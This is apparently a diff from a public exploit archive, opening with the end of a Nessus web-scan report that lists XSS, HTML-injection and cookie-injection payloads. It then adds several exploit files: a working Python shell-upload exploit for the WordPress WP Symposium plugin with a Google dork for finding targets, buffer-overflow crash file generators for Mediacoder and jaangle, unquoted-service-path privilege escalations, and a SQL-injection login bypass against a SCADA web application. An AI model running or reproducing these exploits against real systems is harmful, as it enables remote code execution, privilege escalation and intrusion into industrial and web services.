­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=504 o
nerror="alert(504);&sort=&archive=&k=">< Back to resource view</
a>
­­­­­­­­­­­­­­­­­­­­­­­­
Clicking directly on these URLs should exhibit the issue :
(you will probably need to read the HTML source)
/pages/preview.php?sort=504%20onerror="alert(504);
/pages/preview.php?order_by=504%20onerror="alert(504);
References
CWE: 116
CWE: 20
CWE: 442
CWE: 692
CWE: 712
CWE: 722
CWE: 725
CWE: 74
CWE: 751
CWE: 79
CWE: 80
CWE: 801
CWE: 81
CWE: 811
CWE: 83
CWE: 86
----------------------------------------------------------------------------------------------------
Vulnerability: 49067
Name: CGI Generic HTML Injections (quick test)
Type: CGI abuses : XSS
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 3
Risk: 30
CVSS Base Score: 5.0
Description
The remote web server hosts CGI scripts that fail to adequately sanitize
request strings with malicious JavaScript. By leveraging this issue,
an attacker may be able to cause arbitrary HTML to be executed
inuser's browser within the security context of the affected site.
The remote web server may be vulnerable to IFRAME injections or
cross­site scripting attacks :
­ IFRAME injections allow 'virtual defacement' that
might scare or anger gullible users. Such injections
are sometimes implemented for 'phishing' attacks.
­ XSS are extensively tested by four other scripts.
­ Some applications (e.g. web forums) authorize a subset
of HTML without any ill effect. In this case, ignore
this warning.
Solution
Either restrict access to the vulnerable application or contact the
vendor for an update.
Information
Using the GET HTTP method, Nessus found that :
+ The following resources may be vulnerable to HTML injection :
+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=<"jfunqd%20>
­­­­­­­­ output ­­­­­­­­
a
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=<"jfunqd >&archive=&k=">< Back to resource view</a>
­­­­­­­­­­­­­­­­­­­­­­­­
+ The 'order_by' parameter of the /pages/preview.php CGI :
/pages/preview.php?order_by=<"jfunqd%20>
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=<"jfu
nqd >&sort=DESC&archive=&k=">< Back to resource view</a>
­­­­­­­­­­­­­­­­­­­­­­­­
+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=<"jfunqd%20>&search=&order_by=&from=
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=<"jfunqd >&archive=&k=">< Back to resource view</a>
­­­­­­­­­­­­­­­­­­­­­­­­
+ The 'order_by' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=&search=&order_by=<"jfunqd%20>&from=
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=<"jfu
nqd >&sort=&archive=&k=">< Back to resource view</a>
­­­­­­­­­­­­­­­­­­­­­­­­
Clicking directly on these URLs should exhibit the issue :
(you will probably need to read the HTML source)
/pages/preview.php?sort=<"jfunqd%20>
/pages/preview.php?order_by=<"jfunqd%20>
References
CWE: 80
CWE: 86
---------------------------------------------------------------------------------------------------
Vulnerability: SC­1628
Name: SSL cookie without secure flag set
Type: Web Servers
Asset Group: Multiple
Source: SureCloud
IP Address:
Status: Open
Hostname:
Last Seen: 12 Nov 2014
Service: tcp/https:443
Severity: 3
Risk: 30
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )
Resolution Effort: 1
Description
If the secure flag is not set, then the cookie will be transmitted in
clear­text if the user visits any non SSL
(HTTP) URLs within the cookie's scope.
Solution
The secure flag should be set on all cookies that are used for
transmitting sensitive data when accessing
content over HTTPS.
If cookies are used to transmit session tokens, then areas of the
application that are accessed over HTTPS
should employ their own session handling mechanism, and the session
tokens used should never be
transmitted over unencrypted communications.
Information
URI: /pages/help.php
Other Info: thumbs=show; expires=Tue, 08­Aug­2017 01:53:11 GMT
URI: /pages/search.php
Other Info: display=thumbs; httponly
URI: /pages/themes.php
Other Info: saved_themes_order_by=name; httponly
URI: /pages/user_password.php
Other Info: starsearch=deleted; expires=Tue, 12­Nov­2013 01:53:08 GMT; httponly
URI: /pages/user_password.php
Other Info: starsearch=deleted; expires=Tue, 12­Nov­2013 01:54:30 GMT; httponly
URI: /pages/user_request.php
Other Info: starsearch=deleted; expires=Tue, 12­Nov­2013 01:53:07 GMT; httponly
URI: /pages/user_request.php
Other Info: starsearch=deleted; expires=Tue, 12­Nov­2013 01:54:25 GMT; httponly
-------------------------------------------------------------------------------
Vulnerability: 44136
Name: CGI Generic Cookie Injection Scripting
Type: CGI abuses
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname:
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 3
Risk: 30
CVSS Base Score: 5.0
Description
The remote web server hosts at least one CGI script that fails to
adequately sanitize request strings with malicious JavaScript.
By leveraging this issue, an attacker may be able to inject arbitrary
cookies. Depending on the structure of the web application, it may be
possible to launch a 'session fixation' attack using this mechanism.
Please note that :
­ Nessus did not check if the session fixation attack is
feasible.
­ This is not the only vector of session fixation.
Solution
Restrict access to the vulnerable application. Contact the vendor
for a patch or upgrade.
Information
Using the GET HTTP method, Nessus found that :
+ The following resources may be vulnerable to cookie manipulation :
+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=<script>document.cookie="testshay=5812;"</script
>
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=<script>document.cookie="testshay=5812;"</script>&archive=&k="><&nbs
p;Back to resource view</a>
­­­­­­­­­­­­­­­­­­­­­­­­
/pages/preview.php?sort=&sort=<script>document.cookie="testshay=5812;"</
script>
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=<script>document.cookie="testshay=5812;"</script>&archive=&k="><&nbs
p;Back to resource view</a>
­­­­­­­­­­­­­­­­­­­­­­­­
References
CWE: 472
CWE: 642
CWE: 715
CWE: 722
--------------------------------------------------------------------------------------------
Vulnerability: 39466
Name: CGI Generic XSS (quick test)
Type: CGI abuses : XSS
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname:
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 3
Risk: 30
CVSS Base Score: 5.0
Description
The remote web server hosts CGI scripts that fail to adequately sanitize
request strings with malicious JavaScript. By leveraging this issue,
an attacker may be able to cause arbitrary HTML and script code
to be executed in a user's browser within the security context of the
affected site.
These XSS are likely to be 'non persistent' or 'reflected'.
Solution
Restrict access to the vulnerable application. Contact the vendor
for a patch or upgrade.
Information
Using the GET HTTP method, Nessus found that :
+ The following resources may be vulnerable to cross­site scripting
(quick+ The 'order_by' parameter of the /pages/preview.php CGI :
/pages/preview.php?order_by=<IMG%20SRC="javascript:alert(104);">
­­­­­­­­ output ­­­­­­­­
test) :
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=<IMG
SRC="javascript:alert(104);">&sort=DESC&archive=&k=">< Back to r
esource view</a>
­­­­­­­­­­­­­­­­­­­­­­­­
/pages/preview.php?order_by=&order_by=<IMG%20SRC="javascript:alert(104);
">
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=<IMG
SRC="javascript:alert(104);">&sort=DESC&archive=&k=">< Back to r
esource view</a>
­­­­­­­­­­­­­­­­­­­­­­­­
+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=<IMG%20SRC="javascript:alert(104);">
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=<IMG SRC="javascript:alert(104);">&archive=&k=">< Back to resou
rce view</a>
­­­­­­­­­­­­­­­­­­­­­­­­
/pages/preview.php?sort=&sort=<IMG%20SRC="javascript:alert(104);">
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=<IMG SRC="javascript:alert(104);">&archive=&k=">< Back to resou
rce view</a>
­­­­­­­­­­­­­­­­­­­­­­­­
References
CWE: 116
CWE: 20
CWE: 442
CWE: 692
CWE: 712
CWE: 722
CWE: 725
CWE: 74
CWE: 751
CWE: 79
CWE: 80
CWE: 801
CWE: 81
CWE: 811
CWE: 83
CWE: 86
--------------------------------------------------------------------------------------------------------------
Also issues to be aware of:
Vulnerability: SC­1629
Name: Cookie without HttpOnly flag set
Type: Web Servers
Asset Group: Multiple
Source: SureCloud
IP Address:
Status: Open
Hostname:
Last Seen: 12 Nov 2014
Service: tcp/https:443
Severity: 3
Risk: 30
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )
Resolution Effort: 1
Description
When the HttpOnly attribute is set on a cookie, then the cookies
value cannot be read or set by client­side
JavaScript.
HttpOnly prevent certain client­side attacks, such as Cross Site
Scripting (XSS), from capturing the cookies
value via an injected script. When HttpOnly is set, script access to
document.cookie results in a blank string
being returned.
Solution
HttpOnly can safely be set for all Cookie values, unless the
application has a specific need for Script access
to cookie contents (which is highly unusual).
Please note also that HttpOnly does not mitigate against all dangers
of Cross Site Scripting ­ any XSS
vulnerabilities identified must still be fixed.
Information
URI: /pages/help.php
Other Info: thumbs=show; expires=Tue, 08­Aug­2017 01:53:11 GMT
-------------------------------------------------------------------------------
Vulnerability: SC­1629
Name: Cookie without HttpOnly flag set
Type: Web Servers
Asset Group: Multiple
Source: SureCloud
IP Address:
Status: Open
Hostname:
Last Seen: 12 Nov 2014
Service: tcp/http:80
Severity: 3
Risk: 30
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )
Resolution Effort: 1
Description
When the HttpOnly attribute is set on a cookie, then the cookies
value cannot be read or set by client­side JavaScript.
HttpOnly prevent certain client­side attacks, such as Cross Site
Scripting (XSS), from capturing the cookies value via an injected
script. When HttpOnly is set, script access to document.cookie results
in a blank string being returned.
Solution
HttpOnly can safely be set for all Cookie values, unless the
application has a specific need for Script access
to cookie contents (which is highly unusual).
Please note also that HttpOnly does not mitigate against all dangers
of Cross Site Scripting ­ any XSS vulnerabilities identified must
still be fixed.
Information
URI: /pages/collection_share.php
Other Info: thumbs=show; expires=Tue, 08­Aug­2017 01:53:42 GMT
URI: /pages/contactsheet_settings.php
Other Info: thumbs=show; expires=Tue, 08­Aug­2017 01:53:38 GMT
URI: /pages/help.php
Other Info: thumbs=show; expires=Tue, 08­Aug­2017 01:53:05 GMT
URI: /pages/preview.php
Other Info: thumbs=hide; expires=Tue, 08­Aug­2017 01:57:55 GMT
URI: /pages/resource_email.php
Other Info: thumbs=show; expires=Tue, 08­Aug­2017 01:57:42 GMT
URI: /pages/view.php
Other Info: thumbs=show; expires=Tue, 08­Aug­2017 01:57:45 GMT

210
platforms/php/webapps/35543.txt Executable file
View file

@ -0,0 +1,210 @@
#!/usr/bin/python
#
# Exploit Name: Wordpress WP Symposium 14.11 Shell Upload Vulnerability
#
#
# Vulnerability discovered by Claudio Viviani
#
# Exploit written by Claudio Viviani
#
#
# 2014-11-27: Discovered vulnerability
# 2014-12-01: Vendor Notification (Twitter)
# 2014-12-02: Vendor Notification (Web Site)
# 2014-12-04: Vendor Notification (E-mail)
# 2014-12-11: No Response/Feedback
# 2014-12-11: Published
#
# Video Demo + Fix: https://www.youtube.com/watch?v=pF8lIuLT6Vs
#
# --------------------------------------------------------------------
#
# The upload function located on "/wp-symposium/server/file_upload_form.php " is protected:
#
# if ($_FILES["file"]["error"] > 0) {
# echo "Error: " . $_FILES["file"]["error"] . "<br>";
# } else {
# $allowedExts = ','.get_option(WPS_OPTIONS_PREFIX.'_image_ext').','.get_option(WPS_OPTIONS_PREFIX.'_doc_ext').','.get_option(WPS_OPTIONS_PREFIX.'_video_ext');
# //echo "Upload: " . $_FILES["file"]["name"] . "<br>";
# $ext = pathinfo($_FILES["file"]["name"], PATHINFO_EXTENSION);
# //echo "Extension: " . $ext . "<br />";
# if (strpos($allowedExts, $ext)) {
# $extAllowed = true;
# } else {
# $extAllowed = false;
# }
# //echo "Type: " . $_FILES["file"]["type"] . "<br>";
# //echo "Size: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
# //echo "Stored in: " . $_FILES["file"]["tmp_name"];
#
# if (!$extAllowed) {
# echo __('Sorry, file type not allowed.', WPS_TEXT_DOMAIN);
# } else {
# // Copy file to tmp location
# ...
# ...
# ...
#
# BUTTTTT "/wp-symposium/server/php/index.php" is not protected and "/wp-symposium/server/php/UploadHandler.php" allow any extension
#
# The same vulnerable files are locate in "/wp-symposium/mobile-files/server/php/"
#
# ---------------------------------------------------------------------
#
# Dork google: index of "wp-symposium"
#
#
# Tested on BackBox 3.x with python 2.6
#
# Http connection
import urllib, urllib2, socket
#
import sys
# String manipulator
import string, random
# Args management
import optparse
# File management
import os, os.path, mimetypes
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url
# Check if file exists and has readable
def checkfile(file):
if not os.path.isfile(file) and not os.access(file, os.R_OK):
print '[X] '+file+' file is missing or not readable'
sys.exit(1)
else:
return file
# Get file's mimetype
def get_content_type(filename):
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
# Create multipart header
def create_body_sh3ll_upl04d(payloadname, randDirName, randShellName):
getfields = dict()
getfields['uploader_uid'] = '1'
getfields['uploader_dir'] = './'+randDirName
getfields['uploader_url'] = url_symposium_upload
payloadcontent = open(payloadname).read()
LIMIT = '----------lImIt_of_THE_fIle_eW_$'
CRLF = '\r\n'
L = []
for (key, value) in getfields.items():
L.append('--' + LIMIT)
L.append('Content-Disposition: form-data; name="%s"' % key)
L.append('')
L.append(value)
L.append('--' + LIMIT)
L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', randShellName+".php"))
L.append('Content-Type: %s' % get_content_type(payloadname))
L.append('')
L.append(payloadcontent)
L.append('--' + LIMIT + '--')
L.append('')
body = CRLF.join(L)
return body
banner = """
___ ___ __
| Y .-----.----.--| .-----.----.-----.-----.-----.
|. | | _ | _| _ | _ | _| -__|__ --|__ --|
|. / \ |_____|__| |_____| __|__| |_____|_____|_____|
|: | |__|
|::.|:. |
`--- ---'
___ ___ _______ _______ __
| Y | _ |______| _ .--.--.--------.-----.-----.-----|__.--.--.--------.
|. | |. 1 |______| 1___| | | | _ | _ |__ --| | | | |
|. / \ |. ____| |____ |___ |__|__|__| __|_____|_____|__|_____|__|__|__|
|: |: | |: 1 |_____| |__|
|::.|:. |::.| |::.. . |
`--- ---`---' `-------'
Wp-Symposium
Sh311 Upl04d Vuln3r4b1l1ty
v14.11
Written by:
Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
)
commandList.add_option('-f', '--file', action="store",
help="Insert file name, ex: shell.php",
)
commandList.add_option('--timeout', action="store", default=10, type="int",
help="[Timeout Value] - Default 10",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target or not options.file:
print(banner)
commandList.print_help()
sys.exit(1)
payloadname = checkfile(options.file)
host = checkurl(options.target)
timeout = options.timeout
print(banner)
socket.setdefaulttimeout(timeout)
url_symposium_upload = host+'/wp-content/plugins/wp-symposium/server/php/'
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
randDirName = id_generator()
randShellName = id_generator()
bodyupload = create_body_sh3ll_upl04d(payloadname, randDirName, randShellName)
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'content-type': content_type,
'content-length': str(len(bodyupload)) }
try:
req = urllib2.Request(url_symposium_upload+'index.php', bodyupload, headers)
response = urllib2.urlopen(req)
read = response.read()
if "error" in read or read == "0" or read == "":
print("[X] Upload Failed :(")
else:
print("[!] Shell Uploaded")
print("[!] Location: "+url_symposium_upload+randDirName+randShellName+".php\n")
except urllib2.HTTPError as e:
print("[X] "+str(e))
except urllib2.URLError as e:
print("[X] Connection Error: "+str(e))

24
platforms/windows/local/35530.py Executable file
View file

@ -0,0 +1,24 @@
# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.m3u)
# Date: 11/29/2010
# Author: Hadji Samir s-dz@hotmail.fr
# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe
# Version: 0.8.33 build 5680
EAX 0012E508
ECX 43434343
EDX 00000000
EBX 43434343
ESP 0012E4A4
EBP 0012E4F4
ESI 0012E508
EDI 00000000
#!/usr/bin/python
buffer = ("http://" + "A" * 845)
nseh = ("B" * 4)
seh = ("C" * 4)
junk = ("D" * 60)
f= open("exploit.m3u",'w')
f.write(buffer + nseh + seh + junk)
f.close()

25
platforms/windows/local/35531.py Executable file
View file

@ -0,0 +1,25 @@
# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.lst)
# Date: 11/29/2010
# Author: Hadji Samir s-dz@hotmail.fr
# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe
# Version: 0.8.33 build 5680
EAX 0012E788
ECX 43434343
EDX 00000000
EBX 43434343
ESP 0012E724
EBP 0012E774
ESI 0012E788
EDI 00000000
#!/usr/bin/python
buffer = ("http://" + "A" * 845)
nseh = ("B" * 4)
seh = ("C" * 4)
junk = ("D" * 60)
f= open("exploit.lst",'w')
f.write(buffer + nseh + seh + junk)
f.close()

47
platforms/windows/local/35532.py Executable file
View file

@ -0,0 +1,47 @@
# jaangle 0.98i.977 Denial of Service Vulnerability
# Author: hadji samir , s-dz@hotmail.fr
# Download : http://www.jaangle.com/downloading?block
# Tested : Windows 7 (fr)
# DATE : 2012-12-13
#
###################################################################
EAX 000000C0
ECX 00000000
EDX 00000000
EBX 00000003
ESP 01C5FE28
EBP 01C5FF88
ESI 00000002
EDI 002B4A98
EIP 776964F4 ntdll.KiFastSystemCallRet
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDC000(8000)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00000206 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
#!/usr/bin/python
buff = ("\x41" * 30000 )
f = open("exploit.m3u",'w')
f.write( buff )
f.close()

38
platforms/windows/local/35534.txt Executable file
View file

@ -0,0 +1,38 @@
# Exploit Title: HTCSyncManager 3.1.33.0 (HSMServiceEntry.exe) Service Trusted Path Privilege Escalation
# Date: 12/12/2014
#Author: Hadji Samir s-dz@hotmail.fr
#Product web page: http://www.htc.com/fr/software/htc-sync-manager/
#Affected version: 3.1.33.0
#Tested on: Windows 7 (FR)
HTC Synchronisation manager for devices HTC
Vulnerability Details
There are weak permissions for 'HTCSyncManager'default installation where everyone is allowed to change
the HSMServiceEntry.exe with an executable of their choice. When the service restarts or the system reboots
the attacker payload will execute on the system with SYSTEM privileges.
C:\Users\samir>sc qc HTCMonitorService
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: HTCMonitorService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\HTC\HTC Sync Manager\HSMServiceEntry.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : HTCMonitorService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\samir>icacls "C:\Program Files\HTC\HTC Sync Manager\HSMServiceEntry.exe"
C:\Program Files\HTC\HTC Sync Manager\HSMServiceEntry.exe AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
1 fichiers correctement traités ; échec du traitement de 0 fichiers

37
platforms/windows/local/35537.txt Executable file
View file

@ -0,0 +1,37 @@
# Exploit Title: Avira 14.0.7.342 (avguard.exe) Service Trusted Path Privilege Escalation
# Date: 11/12/2014
#Author: Hadji Samir s-dz@hotmail.fr
#Product web page: http://www.avira.com/
#Affected version: 14.0.7.342
#Tested on: Windows 7 (FR)
Avira free antivirus 14.0.7.342
(avguard.exe)
Avira free antivirus 14.0.7.342 contains a flaw in the 'avguard.exe' file that may reportedly allow gaining access to unauthorized privileges.
The issue is due to an unquoted search path, which may allow a local attacker
to inject arbitrary code in the root path.
C:\Users\samir>sc qc AntiVirService
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: AntiVirService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\Avira\AntiVir Desktop\avguard.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Avira Real-Time Protection
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\samir>icacls "C:\Program Files\Avira\AntiVir Desktop\avguard.exe"
C:\Program Files\Avira\AntiVir Desktop\avguard.exe AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
1 fichiers correctement traités ; échec du traitement de 0 fichiers

41
platforms/windows/local/35542.txt Executable file
View file

@ -0,0 +1,41 @@
# Exploit Title:CodeMeter 4.50.906.503 Service Trusted Path Privilege Escalation
# Date: 07/12/2014
#Author: Hadji Samir s-dz@hotmail.fr
#Product web page: http://www.wibu.com/fr/codemeter.html
#Affected version: 4.50.906.503
#Tested on: Windows 7 (FR)
'CodeMeter.exe '
CodeMeter represents the basic technology of all protection and licensing solutions from Wibu-Systems.
CodeMeter contains a flaw in the 'CodeMeter.exe'
file that may reportedly allow gaining access to unauthorized privileges.
The issue is due to an unquoted search path, which may allow a local attacker
to inject arbitrary code in the root path.
C:\Users\samir>sc qc CodeMeter.exe
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: CodeMeter.exe
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : CodeMeter Runtime Server
DEPENDENCIES : Tcpip
: Winmgmt
SERVICE_START_NAME : LocalSystem
C:\Users\samir>icacls "C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe"
C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
1 fichiers correctement traités ; échec du traitement de 0 fichiers

63
platforms/windows/webapps/35529.txt Executable file
View file

@ -0,0 +1,63 @@
?
Soitec SmartEnergy 1.4 SCADA Login SQL Injection Authentication Bypass Exploit
Vendor: Soitec
Product web page: http://www.soitec.com
Affected version: 1.4 and 1.3
Summary: Soitec power plants are a profitable and ecological investment
at the same time. Using Concentrix technology, Soitec offers a reliable,
proven, cost-effective and bankable solution for energy generation in the
sunniest regions of the world. The application shows how Concentrix technology
works on the major powerplants managed by Soitec around the world. You will
be able to see for each powerplant instantaneous production, current weather
condition, 3 day weather forecast, Powerplant webcam and Production data history.
Desc: Soitec SmartEnergy web application suffers from an authentication bypass
vulnerability using SQL Injection attack in the login script. The script fails
to sanitize the 'login' POST parameter allowing the attacker to bypass the security
mechanism and view sensitive information that can be further used in a social
engineering attack.
Tested on: nginx/1.6.2
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Vendor status:
[16.11.2014] Vulnerability discovered.
[02.12.2014] Vendor contacted.
[08.12.2014] Vendor responds asking more details.
[08.12.2014] Sent details to the vendor.
[09.12.2014] Vendor confirms the vulnerability.
[12.12.2014] Vendor applies fix to version 1.4.
[14.12.2014] Coordinated public security advisory released.
Advisory ID: ZSL-2014-5216
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5216.php
16.11.2014
---
POST /scada/login HTTP/1.1
Host: smartenergy.soitec.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://smartenergy.soitec.com/scada/login
Cookie: csrftoken=ygUcdD2i1hFxUM6WpYB9kmrWqFhlnSBY; _ga=GA1.2.658394151.1416124715; sessionid=ixi3w5s72yopc29t9ewrxwq15lzb7v1e
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
csrfmiddlewaretoken=ygUcdD2i1hFxUM6WpYB9kmrWqFhlnSBY&login=%27+or+1%3D1--&password=blah